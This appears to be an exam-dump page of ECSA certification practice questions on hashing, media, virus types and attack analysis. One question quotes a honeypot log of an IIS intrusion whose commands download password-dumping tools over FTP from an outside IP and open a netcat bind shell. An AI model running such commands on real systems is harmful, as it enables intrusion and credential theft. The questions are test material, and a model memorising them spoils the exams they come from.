Online Access Free EC0-479 Practice Test

Exam Code:	EC0-479
Exam Name:	EC-Council Certified Security Analyst(ECSA)
Certification Provider:	EC-COUNCIL
Free Question Number:	232
Posted:	Dec 11, 2025

Rating

100%

Page: 1 / 47
Total 232 questions

Question 1

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?

A.16
B.128
C.32
D.64

Question 2

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not affected by the magnet.

A.logical
B.optical
C.magnetic
D.anti-magnetic

Question 3

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo
haxedj00 >>ftpcom"
"cmd1.exe /c echo get n
C.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp-
s:ftpcom"
"cmd1.exe /c nc
-l -p 6969 -
e cmd1.exe"
What can you infer from the exploit given?

A.It is a local exploit where the attacker logs in using username johna2k
B.The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
C.There are two attackers on the system -johna2k and haxedj00
D.The attack is a remote exploit and the hacker downloads three files

Question 4

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?

A.Oligomorhic
B.Transmorphic
C.Metamorphic
D.Polymorphic

Question 5

The MD5 program is used to:

A.view graphics files on an evidence drive
B.wipe magnetic media before recycling it
C.make directories on a evidence disk
D.verify that a disk is not altered when you examine it

Latest Upload: 107EMC.D-VXR-DS-00.v2025-12-24.q43; 109Splunk.SPLK-5001.v2025-12-24.q37; 105Huawei.H19-308-ENU.v2025-12-24.q74; 105APMG-International.AgilePM-Foundation.v2025-12-24.q74; 121SAP.C-C4H62-2408.v2025-12-24.q81; 108ASHRAE.HFDP.v2025-12-24.q39; 113ISQI.CTFL-UT.v2025-12-23.q13; 123ARDMS.SPI.v2025-12-23.q102; 118Microsoft.SC-300.v2025-12-23.q333; 120PaloAltoNetworks.PSE-Prisma-Pro-24.v2025-12-23.q39